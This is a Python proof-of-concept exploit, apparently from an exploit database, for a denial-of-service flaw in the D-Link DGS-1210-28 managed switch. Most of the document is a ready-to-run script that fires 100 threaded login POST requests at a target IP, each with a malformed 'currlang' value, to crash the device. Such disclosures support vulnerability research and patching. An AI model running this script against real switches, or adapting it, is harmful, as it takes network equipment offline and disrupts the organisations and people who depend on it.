#
# Exploit Title: D-Link DGS-1210-28 Denial of Service
# Date: 18 Sep 2020
# Exploit Author: Saeed Reza Zamanian
# Product : D-Link DGS-1210-28
# Vendor Homepage: https://www.dlink.com/
# Product Link: https://www.dlink.com/en/products/dgs-1210-28-28-port-gigabit-smart-managed-switch
# Version : DGS-1210-28
#
# Description : Device Login page is vulnerable against DoS attack. "currlang" parameter can accept 
# int values , # if an attacker sends several requests with string value in currlang parameter it 
# can affect device availability.
#
# Caution: Use this PoC at your own risk.


import requests
import json
import sys
import os
from concurrent.futures import ThreadPoolExecutor, as_completed
from time import time


intro = "==============================\n D-Link DGS-1210-28 DoS Tool \n==============================\nUsage : python3 "+os.path.basename(__file__)+ " IPAddress"

if len(sys.argv) < 2:
        print(intro+"\n--------------\nFew Parameters\n")
        exit()


def sendRequest(ip):
    url = 'https://'+ip+'/homepage.htm'
    postData = "Password=anyanyany&currlang=40anyanyany&Login=admin&BrowsingPage=index_dlink.htm&changlang=0"
    r = requests.post(url, data = postData, headers = "")

def process(ip):
        processes = []
        with ThreadPoolExecutor(max_workers=10) as executor:
            for x in range(100):
                processes.append(executor.submit(sendRequest,str(ip)))
        for task in as_completed(processes):
                if task.result(): print(task.result())


process(sys.argv[1])

#EOF